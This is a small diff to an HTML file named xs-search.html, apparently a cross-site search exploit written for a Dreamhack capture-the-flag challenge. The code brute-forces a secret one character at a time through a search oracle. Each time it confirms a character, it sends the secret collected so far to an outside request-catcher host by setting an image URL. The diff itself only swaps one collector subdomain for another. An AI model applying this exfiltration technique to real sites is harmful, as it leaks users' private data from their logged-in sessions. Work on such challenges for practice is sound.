--- a/xs-search.html
+++ b/xs-search.html
@@ -33,7 +33,7 @@
             for (let c of chars) {
                 if (await search(secret + c)) {
                     secret += c;
-                    img.src = `https://sajhkwo.request.dreamhack.games/${secret}`;
+                    img.src = `https://gtboivz.request.dreamhack.games/${secret}`;
                     break;
                 }
             }
